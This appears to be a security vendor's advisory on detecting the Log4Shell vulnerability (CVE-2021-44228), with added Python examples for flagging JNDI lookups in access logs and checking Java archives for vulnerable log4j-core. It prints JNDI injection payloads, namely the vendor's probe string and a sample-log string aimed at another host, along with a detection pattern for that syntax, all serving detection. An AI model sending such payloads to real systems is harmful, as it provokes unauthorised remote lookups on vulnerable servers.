Log4j is affected by a critical vulnerability, CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker-controlled LDAP and other JNDI-related endpoints.
The following log4j-core versions are vulnerable: >=2.0-beta9 and <=2.14.1, including all upstream products which rely on them.
We support detection of the Log4Shell vulnerability through the following methods:
Agent-Based Technique
Footprint Agent detects all affected upstream products whose vendors have already confirmed them as vulnerable. At the time of writing the list of vendors includes the following:
Apache
Apero
Amazon
Bitnami
Broadcom
Cisco
ConnectWise
Dynatrace
Elastic
F-Secure
Graylog
HCLTech
Informatica
JAMF
Metabase
Minecraft
Netapp
NSA
We keep updating this list as vendors issue new advisories and confirm vulnerable products. For a real-time list of vulnerable products, please check out our API directly: https://midgard2.codacloud.net/api/v3/search/cve-details/CVE-2021-44228
All vulnerable libraries loaded in memory by a running app - detection based on well-known vulnerable JAR file names (starting with Footprint Agent version 5.4.10)
All vulnerable libraries loaded in memory by a running app - detection based on Java bytecode class hashes compared against known vulnerable hashes (this overcomes bypass techniques based on renamed files or recompiled source code)
Agentless Detection (still in development, expected release date 14th of December)
The agentless detection attempts to provoke a benign exploitation by injecting a neutralized exploit payload into the User-Agent header of requests sent to the targets configured within Footprint.
You should expect your Cloud/Internal Scanners to scan your already identified web apps with this technique.
The actual payload within the User-Agent header looks like this: ${jndi:ldap://honey.codacloud.net:1389/961996f4-327a-48cb-824d-5a7e653b61d7}
If your web apps use vulnerable versions of Log4j, expect call-home traffic to honey.codacloud.net:1389 via LDAP. This traffic is benign (we don't execute any code), but you'll see the vulnerability show up inside Footprint.
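To help a SOC tell the scanner's benign probe apart from anything else carrying the same lookup syntax, here is an added example (not Footprint's code) that parses constructed combined-format access log lines, flags requests whose User-Agent, referer or request line contains a JNDI lookup, and extracts the call-home destination so it can be correlated with egress firewall logs for the LDAP traffic mentioned above. The log lines, IP addresses and the HONEY_HOST classification are assumptions made for this example; only the honey.codacloud.net:1389 endpoint and the payload format come from the page.

```python
"""Flag HTTP requests carrying a JNDI lookup string and extract the call-home target.

Added example, not Footprint's code. Log lines below are constructed; the second
one carries the page's own neutralized honey payload.
"""
import re

HONEY_HOST = "honey.codacloud.net"  # the page's benign call-home endpoint

# Apache/nginx combined log: ip ident user [time] "request" status bytes "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Literal ${jndi:scheme://host[:port]...} lookup; captures where a vulnerable
# Log4j instance would connect so the destination can be matched in egress logs.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)

def classify(value):
    """Return None, or a dict describing the lookup found in one header value."""
    m = JNDI_RE.search(value)
    if not m:
        return None
    host = m.group("host").lower()
    return {
        # The vendor's own scanner is expected traffic; anything else needs triage.
        "verdict": "honey-scan" if host == HONEY_HOST else "jndi-lookup",
        "scheme": m.group("scheme").lower(),
        "host": host,
        "port": int(m.group("port")) if m.group("port") else None,
    }

def scan_log(lines):
    """Parse combined-format lines and return one hit per request carrying a lookup."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than mis-parse
        for field in ("ua", "referer", "request"):
            hit = classify(m.group(field))
            if hit:
                hit.update(ip=m.group("ip"), field=field, request=m.group("request"))
                hits.append(hit)
                break
    return hits

def egress_watchlist(hits):
    """Destinations a vulnerable host would have called back to; compare with firewall logs."""
    return {(h["host"], h["port"]) for h in hits}

# Constructed sample log (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://honey.codacloud.net:1389/961996f4-327a-48cb-824d-5a7e653b61d7}"',
    '192.0.2.44 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${jndi:ldap://203.0.113.99:1389/a}"',
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["field"], h["verdict"], h["host"], h["port"])
    print("watch egress to:", egress_watchlist(found))
```

The honey-scan verdict only says the lookup points at the vendor's endpoint; whether the application actually resolved it is answered by the egress side, which is why the watchlist is returned separately.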
Manual validation of Java EE application packages (in the form of JAR/WAR/EAR) - starting with Footprint version 7.5.76
You can find this feature under Scan Surface → Java EE Security. There is no need to run it manually if you’ve got agents already installed on all your machines.
Due to the breadth and depth of the attack, we decided to open up this manual testing procedure to anybody who needs to validate an existing Java app. Simply upload the file here from anywhere: Log4Shell - Public Manual Java EE Package Testing
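For readers who want to understand what a package check like the one above, and the agent's name-based and class-hash-based detection described earlier, look at inside a JAR/WAR/EAR, here is an added example that is not Footprint's code. It opens an archive (recursing into nested jars), reads the log4j-core version from the Maven pom.properties, compares it against the vulnerable range stated on this page, and hashes the JndiLookup class bytes against a known-bad set, so a renamed jar is still caught. The known-bad hash set, the sample WAR and the class bytes are constructed placeholders for this example; a real deployment would load vendor-published hashes.

```python
"""Offline check of a Java package (JAR/WAR/EAR) for vulnerable log4j-core.

Added example, not Footprint's code. It combines the two signals the page
describes: the log4j-core version string and the hash of the JndiLookup
class bytes, checked against a known-bad set. The known-bad set and the
sample WAR below are constructed placeholders.
"""
import hashlib
import io
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED_ARCHIVE = re.compile(r"\.(jar|war|ear)$", re.IGNORECASE)
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.IGNORECASE)

# SHA-256 digests of known-vulnerable JndiLookup.class files. Empty placeholder;
# a real deployment loads a vendor-maintained list.
KNOWN_BAD_CLASS_HASHES = set()

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def is_vulnerable_version(version):
    """True for log4j-core >=2.0-beta9 and <=2.14.1, the range given on the page."""
    m = VERSION_RE.match(version.strip())
    if not m:
        return False  # unparseable: report separately rather than guess
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    tag, num = m.group(4), m.group(5)
    if major != 2:
        return False
    if tag:  # 2.0 pre-releases: beta9 and later betas, and every rc build
        tag = tag.lower()
        return minor == 0 and (tag == "rc" or (tag == "beta" and int(num) >= 9))
    return (minor, patch) <= (14, 1)

def scan_archive(data, path=""):
    """Inspect archive bytes (recursing into nested JAR/WAR/EAR) and return findings.

    Detection keys off archive contents, not file names, so a renamed
    log4j-core jar is still found.
    """
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        digest = sha256_hex(zf.read(JNDI_LOOKUP_CLASS)) if JNDI_LOOKUP_CLASS in names else None
        if version is not None or digest is not None:
            findings.append({
                "archive": path,
                "version": version,
                # False when the class was deleted from the jar as a mitigation
                "jndi_lookup_present": digest is not None,
                "class_sha256": digest,
                "vulnerable_by_version": version is not None and is_vulnerable_version(version),
                "vulnerable_by_hash": digest in KNOWN_BAD_CLASS_HASHES,
            })
        for name in sorted(names):
            if NESTED_ARCHIVE.search(name):
                findings.extend(scan_archive(zf.read(name), f"{path}!{name}" if path else name))
    return findings

def scan_file(filename):
    with open(filename, "rb") as fh:
        return scan_archive(fh.read(), filename)

SAMPLE_CLASS_BYTES = b"\xca\xfe\xba\xbe" + b"constructed placeholder, not real bytecode"

def build_sample_war():
    """Constructed sample: a WAR bundling log4j-core 2.14.1 under a misleading jar name."""
    jar = io.BytesIO()
    with zipfile.ZipFile(jar, "w") as z:
        z.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=2.14.1\n")
        z.writestr(JNDI_LOOKUP_CLASS, SAMPLE_CLASS_BYTES)
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/web.xml", "<web-app/>")
        z.writestr("WEB-INF/lib/utils-renamed.jar", jar.getvalue())
    return war.getvalue()

if __name__ == "__main__":
    for finding in scan_archive(build_sample_war(), "app.war"):
        print(finding)
```

A version match and a class-hash match are reported as separate fields on purpose: a jar whose pom.properties says 2.14.1 but no longer contains JndiLookup.class has had the class removed, and a jar with no pom.properties but a known-bad class hash has been repackaged, and the two cases call for different follow-up.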
All these features are also included in the Trial licenses.
We are continuing to develop and improve the detections. Please revisit this page to follow our progress. If you need any more details, feel free to contact us anytime.